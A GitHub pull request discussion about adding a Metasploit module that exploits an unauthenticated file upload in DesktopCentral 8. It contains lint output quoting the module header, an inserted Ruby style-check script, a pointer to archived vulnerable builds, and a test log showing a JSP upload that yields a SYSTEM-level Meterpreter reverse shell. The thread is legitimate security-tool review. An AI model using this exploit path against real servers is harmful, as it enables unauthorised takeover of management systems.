
Add DesktopCentral arbitrary file upload exploit. #2650

Merged

Conversation

cartel0x27

No description provided.

@jvazquez-r7
Contributor

Processing....

@jvazquez-r7
Contributor

Module isn't msftidy compliant; it should be before continuing:

$ tools/msftidy.rb modules/exploits/windows/http/desktopcentral_file_upload.rb 
modules/exploits/windows/http/desktopcentral_file_upload.rb - [WARNING] Module should not be marked executable
modules/exploits/windows/http/desktopcentral_file_upload.rb - [ERROR] Incorrect disclosure date format
modules/exploits/windows/http/desktopcentral_file_upload.rb:14 - [WARNING] Tabbed indent: "\tinclude Msf::Exploit::Remote::HttpClient\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:15 - [WARNING] Tabbed indent: "\tinclude Msf::Exploit::EXE\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:18 - [WARNING] Tabbed indent: "\tdef initialize(info = {})\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:19 - [WARNING] Tabbed indent: "\t\tsuper(update_info(info,\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:20 - [WARNING] Tabbed indent: "\t\t\t'Name'           => 'DesktopCentral AgentLogUpload Arbitrary File Upload',\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:21 - [WARNING] Tabbed indent: "\t\t\t'Description'    => %q{\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:22 - [WARNING] Tabbed indent: "\t\t\t\t\tThis module exploits an arbitrary file upload vulnerability in DesktopCentral 8.0.0 build 80286 or below..\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:23 - [WARNING] Tabbed indent: "\t\t\t\tA malicious user can upload a JSP file into the web root without authentication, leading to arbitrary code execution.\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:24 - [WARNING] Tabbed indent: "\t\t\t},\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:25 - [WARNING] Tabbed indent: "\t\t\t'Author'         =>\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:26 - [WARNING] Tabbed indent: "\t\t\t\t[\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:27 - [WARNING] Tabbed indent: "\t\t\t\t\t'Thomas Hibbert' # thomas.hibbert@security-assessment.com\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:28 - [WARNING] Tabbed indent: "\t\t\t\t],\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:29 - [WARNING] Tabbed indent: "\t\t\t'License'        => MSF_LICENSE,\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:30 - [WARNING] Tabbed indent: "\t\t\t'References'     =>\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:31 - [WARNING] Tabbed indent: "\t\t\t\t[\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:32 - [WARNING] Tabbed indent: "\t\t\t\t],\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:33 - [WARNING] Tabbed indent: "\t\t\t'Payload'\t     =>\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:34 - [WARNING] Tabbed indent: "\t\t\t\t{\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:35 - [WARNING] Tabbed indent: "\t\t\t\t\t'BadChars' => \"\\x00\",\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:36 - [WARNING] Tabbed indent: "\t\t\t\t},\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:37 - [WARNING] Tabbed indent: "\t\t\t'Platform'       => 'win',\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:38 - [WARNING] Tabbed indent: "\t\t\t'Arch'\t\t     => ARCH_X86,\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:39 - [WARNING] Tabbed indent: "\t\t\t'Targets'        =>\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:40 - [WARNING] Tabbed indent: "\t\t\t\t[\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:41 - [WARNING] Tabbed indent: "\t\t\t\t\t[ 'Desktop Central server / Windows', {} ],\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:43 - [WARNING] Tabbed indent: "\t\t\t\t],\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:44 - [WARNING] Tabbed indent: "\t\t\t'DefaultTarget'  => 0,\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:45 - [WARNING] Tabbed indent: "\t\t\t'DisclosureDate' => 'some point....'))\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:47 - [WARNING] Tabbed indent: "\t\tregister_options(\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:48 - [WARNING] Tabbed indent: "\t\t\t[\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:50 - [WARNING] Tabbed indent: "\t\t\t], self.class)\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:51 - [WARNING] Tabbed indent: "\tend\n"
modules/exploits/windows/http/desktopcentral_file_upload.rb:52 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:61 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:68 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:74 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:78 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:81 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:84 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:86 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:89 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:95 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:102 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:110 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:116 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:118 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:120 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:131 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:135 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:138 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:144 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:147 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb:152 - [WARNING] Spaces at EOL
modules/exploits/windows/http/desktopcentral_file_upload.rb - [WARNING] Module contains old license comment, use tools/dev/resplat.rb <filename>.

'Thomas Hibbert' # thomas.hibbert@security-assessment.com
],
'License' => MSF_LICENSE,
'References' =>

Isn't there any reference :?

@jvazquez-r7
Contributor

msftidy still complains:

$ tools/msftidy.rb modules/exploits/windows/http/desktopcentral_file_upload.rb
modules/exploits/windows/http/desktopcentral_file_upload.rb:57 - [WARNING] Spaces at EOL

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

The full module should follow the indentation standard described here: https://github.com/rapid7/metasploit-framework/wiki/Indentation-Standards

The important thing is: "Using two-space soft tabs" which translates as "one indent level == two-space soft tab" :)
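The msftidy output earlier in this thread and the indentation note above describe the same set of style checks. The following Ruby is an added example, not the project's msftidy.rb and not code from this pull request: a small lint that reproduces the four findings reported here (tab-indented lines, trailing spaces, the DisclosureDate format, the executable bit) and a fixer that converts each leading tab into the two-space soft tab the indentation standard asks for. The sample module text is constructed for the demonstration, and the accepted date format ('Mon DD YYYY', e.g. 'Nov 21 2013') is an assumption about what msftidy expected at the time.

```ruby
# Added example, not Metasploit's tools/msftidy.rb: a minimal re-implementation
# of the checks reported on this pull request, plus the indentation fix.

# Assumed msftidy disclosure-date format: 'Mon DD YYYY', e.g. 'Nov 21 2013'.
DISCLOSURE_DATE_RE = /\A[A-Z][a-z]{2} \d{1,2} \d{4}\z/

# Constructed module fragment that reproduces every finding from the thread:
# tab indents, spaces at EOL, and a free-text DisclosureDate.
SAMPLE_MODULE = [
  "class Metasploit3 < Msf::Exploit::Remote",
  "\tRank = ExcellentRanking",
  "\tdef initialize(info = {})",
  "\t\tsuper(update_info(info,   ",
  "\t\t\t'DisclosureDate' => 'some point....'))",
  "\tend",
  "end",
].join("\n") + "\n"

# Runs the line-level checks over module source and returns the warnings
# in the same "<line> - [LEVEL] message" shape msftidy prints.
def tidy_warnings(source)
  warnings = []
  source.each_line.with_index(1) do |line, idx|
    # One indent level must be two spaces; any leading tab is a warning.
    warnings << "#{idx} - [WARNING] Tabbed indent: #{line.inspect}" if line =~ /^\t/
    # '$' matches just before the trailing newline, so this catches "foo  \n".
    warnings << "#{idx} - [WARNING] Spaces at EOL" if line =~ /[ \t]$/
    # DisclosureDate must be a real date string, not prose like 'some point....'.
    if line =~ /'DisclosureDate'\s*=>\s*'([^']*)'/ && $1 !~ DISCLOSURE_DATE_RE
      warnings << "#{idx} - [ERROR] Incorrect disclosure date format"
    end
  end
  warnings
end

# File-level wrapper that adds the executable-bit check; modules are loaded
# by the framework and should never carry +x.
def tidy_file(path)
  warnings = tidy_warnings(File.read(path))
  warnings.unshift("[WARNING] Module should not be marked executable") if File.executable?(path)
  warnings
end

# Rewrites leading tabs as two-space soft tabs (one tab == one indent level)
# and strips trailing whitespace, which clears the two WARNING classes above.
def soften_tabs(source)
  source.each_line.map do |line|
    if (m = line.match(/\A(\t+)/))
      line = ('  ' * m[1].length) + line[m[0].length..-1]
    end
    line.sub(/[ \t]+$/, '')
  end.join
end

if __FILE__ == $0
  puts "Before fix:"
  tidy_warnings(SAMPLE_MODULE).each { |w| puts "  #{w}" }
  puts "After soften_tabs:"
  tidy_warnings(soften_tabs(SAMPLE_MODULE)).each { |w| puts "  #{w}" }
end
```

Running the file prints the seven findings for the constructed fragment and then the single remaining error (the DisclosureDate string), which the fixer deliberately does not touch: a real date has to come from the advisory, not from a script.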

@jvazquez-r7
Contributor

I've downloaded the trial but it is build 80294 so the module isn't working because of the patch I guess. Do you know if DesktopCentral keeps a repository of old versions? Otherwise we'll need a pcap of the module working for verification. You can send it to msfdev[at]metasploit.com. Thanks!

@cartel0x27
Author

Hi,

There's a repository of old versions at
http://archives.manageengine.com/desktop-central/. 80292 should work.

GPG ID: 8BB3F67B651E52C81CC4BDEC3CA0319F6E9ECEBA

On 21 November 2013 04:21, Juan Vazquez notifications@github.com wrote:

I've download the trial but it is build 80294 so the module isn't working
because of the patch I guess. Do you know if DesktopCentral keeps a
repository of old versions? Otherwise we'll need a pcap of the module
working for verification. You can send it to msfdev[at]metasploit.com.
Thanks!


@jvazquez-r7
Contributor

cool, thank you, testing!

@jvazquez-r7 jvazquez-r7 merged commit 4cc20f1 into rapid7:master Nov 21, 2013
@jvazquez-r7
Contributor

Tested successfully, thanks @pnegry !!!

Did some changes and clean up, you can see the final result here: 851cf6f

Please feel free to review and don't hesitate to ask if you have questions :) Hope it's useful in making your other pull request easier :)

Test result:

msf exploit(desktopcentral_file_upload) > reload
[*] Reloading module...
check
msf exploit(desktopcentral_file_upload) > check

[*] Manage Desktop Central 8 build 80292 found
[+] The target is vulnerable.
msf exploit(desktopcentral_file_upload) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.136:8020 - Uploading JSP to execute the payload
[*] 192.168.172.136:8020 - Executing payload
[*] Sending stage (769024 bytes) to 192.168.172.136
[*] Meterpreter session 4 opened (192.168.172.1:4444 -> 192.168.172.136:2433) at 2013-11-21 09:29:36 -0600
[+] Deleted ..\webapps\DesktopCentral\biutxffk.jsp
[!] This exploit may require manual cleanup of: jlejatqp.exe

meterpreter > getuid
dServer username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
eComputer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 4 closed.  Reason: User exit
